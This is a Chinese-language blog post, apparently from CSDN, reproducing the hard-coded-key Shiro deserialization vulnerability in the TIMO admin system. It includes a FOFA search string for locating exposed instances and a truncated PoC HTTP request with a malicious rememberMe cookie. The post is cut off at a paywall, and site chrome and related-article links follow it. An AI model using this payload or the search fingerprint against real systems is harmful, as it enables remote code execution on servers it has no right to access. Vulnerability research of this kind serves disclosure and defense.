TIMO后台管理系统 Shiro 反序列化漏洞复现

最新推荐文章于 2024-04-18 12:33:53 发布
最新推荐文章于 2024-04-18 12:33:53 发布
阅读量973 收藏 10
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134844439
版权

0x01 产品简介

  TIMO 后台管理系统,基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,支持前后台模块分别部署,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、代码生成等,为快速开发后台系统而生的脚手架。

0x02 漏洞概述

 TIMO 后台管理系统2.0及之前版本存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:app="TIMO后台管理系统"

0x04 漏洞复现 

PoC

GET /login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: rememberMe=BaBTqXjRCAeunEoyck90V28hjwrfl81lk1A+MvH49cIndYJNbOyBqi0LYwteXi7gITfe4jMWt5u7spLW4AYwBG/s1fcJLAk2W3GW1RDxWytCigs3Y31jTuNqb7l2r5L
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Timo后台管理系统(mysql版).zip
01-12
官网:http://42.194.205.137/ 用户管理:用于管理后台系统的用户,可进行增删改查等操作。 角色管理:分配权限的最小单元,通过角色给用户分配权限。 菜单管理:用于配置系统菜单,同时也作为权限资源。 部门管理:通过不同的部门来管理和区分用户。 字典管理:对一些需要转换的数据进行统一管理,如:男、女等。 行为日志:用于记录用户对系统的操作,同时监视系统运行时发生的错误。 文件上传:内置了文件上传接口,方便开发者使用文件上传功能。 代码生成:可以帮助开发者快速开发项目,减少不必要的重复操作,花更多精力注重业务实现。 表单构建:通过拖拽的方式快速构建一个表单模块。---这个牛 数据接口:根据业务代码自动生成相关的api接口文档
TIMO 后台管理系统 v2.0.1 发布,加入 jwt 身份验证组件,基于 Spring Boot
weixin_33801856的博客
04-28 278
开发四年只会写业务代码,分布式高并发都不会还做程序员? TIMO后台管理系统v2.0.1版本已发布(基于SpringB...
Shiro反序列化漏洞原理详解及复现,2024年最新0基础Golang开发
最新发布
2401_84254196的博客
04-18 586
不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!生成CC链,再次按照上述方式发送,执行命令为反弹shell(CC6可打通),注意vulhub靶机本身没有nc,如果使用nc需要先上传。删除JSESSIONID(当该字段存在时,不检测rememberMe),修改rememberMe为加密后的值发送。AES解密,shiro默认加密方式,存在padding oracle攻击及密钥泄露,是可以利用的核心。
TIMO后台管理系统crud
qq_42303589的博客
07-31 1897
TIMO介绍 序言 TIMO后台管理系统,基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,支持前后台模块分别部署,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、代码生成等,为快速开发后台系统而生的脚手架 克隆代码配置环境并启动 克隆下来代码 https://gitee.com/aun/Timo?_from=gitee_searchidea导入 设置maven和lombo
TIMO 后台管理系统 v2.0 发布,带来全新的项目结构,支持前后台模块分离部署!...
weixin_34032779的博客
04-08 305
开发四年只会写业务代码,分布式高并发都不会还做程序员? TIMO后台管理系统v2.0版本已发布(基于SpringBoo...
java timo,后台管理系统 TIMO
weixin_28791139的博客
03-10 415
软件介绍TIMO后台管理系统,基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、代码生成等,为快速开发后台系统而生的脚手架!技术选型后端技术:SpringBoot + Spring Data Jpa + Thymeleaf...
TIMO后台管理系统.zip
03-03
基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,支持前后台模块分别部署,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、...
TIMO后台管理系统,通用后台管理系统
03-12
TIMO后台管理系统,基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、代码...
Timo后台管理系统 v2.0.3.zip
04-02
Timo后台管理系统 v2.0.3》是一款专为软件工具开发设计的高效后台管理系统。这个版本(v2.0.3)是系统的一次重要更新,旨在提供更稳定、功能更丰富的管理平台,适用于各类软件应用的后台管理需求。作为一款开源...
基于SpringBoot的TIMO后台管理系统设计源码
04-16
本源码项目是基于SpringBoot的TIMO后台管理系统设计,包含827个文件,主要使用Java、HTML、JavaScript和CSS编程语言。该系统基于SpringBoot2.0、Spring Data Jpa、Thymeleaf和Shiro等技术开发,采用分模块的方式便于...
【开题报告】springbootTimo后台管理系统flu36计算机毕业设计源码、研究背景、意义、目的、内容、方案和预期成果
卓越计算机毕设
07-13 325
研究背景: 随着移动互联网的普及和手机市场的快速发展,手机销售平台成为了电子商务领域的重要组成部分。TT手机销售平台作为一家专注于手机销售的在线平台,面临着日益激烈的市场竞争和用户需求多样化的挑战。因此,开展相关研究以提升平台的运营效率和用户体验具有重要的意义。 研究意义: TT手机销售平台的研究对于推动手机销售行业的发展具有重要的意义。通过深入研究平台的运营模式、用户需求和市场趋势,可以帮助平台更好地满足用户的购买需求,提供更优质的商品和服务。同时,该研究也能够为其他手机销售平台提供借鉴和参考,促进整个
用户中心-后台管理系统原型设计
01-14
附件为用户中心-后台管理系统原型设计,Axure RP原型设计文件文档
QQ&TIM提权漏洞分析
INSBUG的博客
07-07 1244
漏洞由于QQProtect.exe与QQProtectEngine.dll未进行进程间通信的指针校验,导致了"Write-What-Where"(WWW,“Write”表示写入的行为。所以我们应该首先更改dword_41A740的值,随后将回调函数的地址修改,也就是修改dword_1012662C的值,最后我们就能通过ROP(Return-Oriented Programming,是一种利用程序中已存在的代码片段"gadgets"来构造恶意代码执行路径的技术)实现攻击。启动SYSTEM权限的shell。
浅谈! 几种 SpringBoot/SpringCloud 开源项目
艾利克斯冰的博客
09-25 809
模块包括:定时任务调度、服务器监控、平台监控、平台设置、开发平台、单点登录、Redis分布式高速缓存、会员、营销、在线用户、日志、在线人数、访问次数、调用次数、直接集群、接口文档、生成模块、代码实例、安装视频、教程文档 代码生成(单表、主附表、树表、列表和表单、redis高速缓存对接代码、图表统计、地图统计、vue.js)、dubbo、springCloud、SpringBoot、mybatis、spring、springmvc。代码简洁,注释齐全,架构清晰,非常适合学习和企业作为基础框架使用。
Apache Shiro系列漏洞利用以及实战总结
jammny
10-14 1万+
前言: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。内置了可以连接大量安全数据源(又名目录)的Realm,如LDAP、关系数据库(JDBC)、类似INI的文本配置资源以及属性文件等。 目录 RememberMe RCE-550(CVE-2016-4437) 远程安全限制绕过漏洞(CVE-2016-6802) Padding Orac
golang - switch_golang switch,一份非常适合收藏的Golang进阶面试题
2401_84252820的博客
04-15 340
不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!fmt.Printf(“请输入一个字符:a,b,c,d,e,f,g\n”)请编写一个程序,该程序可以接收一个字符,比如:a,b,c,d,e,f,g。fmt.Println(“您没有按要求输入,请按照要求输入信息”)fmt.Println(“周一”)fmt.Println(“周二”)fmt.Println(“周三”)fmt.Println(“周四”)
TIMO后台管理系统-入门,简单易懂教程-技巧总结
weixin_73480865的博客
04-05 330
这个项目的技术栈是JPA,会有很多文件去追踪,这些文件大多是使用内部的代码生成器做的,API文档做得不错,之前没做过项目的同学花一天了解API文件还是不错的。
TIMO后台管理系统—基于SpringBoot开发
Auntvt的博客
11-01 4066
TIMO后台管理系统,基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、代码生成等,为快速开发后台系统而生的脚手架! 开源地址:https://gitee.com/aun/Timo 技术选型 后端技术:SpringB...
E-Mobile 后台管理系统漏洞
热门推荐
L6y1a
02-20 1万+
转载:https://blog.csdn.net/qq_27446553/article/details/68203308 E-Mobile 后台管理系统漏洞 可以通过火狐hackbar插件进行验证 Poc : message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensym...
timo后台管理系统漏洞
02-02
Timo后台管理系统是一款广泛应用于企业内部的管理系统,据报道,近期发现了一些与安全性相关的漏洞。这些漏洞可能会使得系统面临一系列潜在威胁和风险。 首先,可能存在认证和授权方面的漏洞。如果恶意攻击者能够绕...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值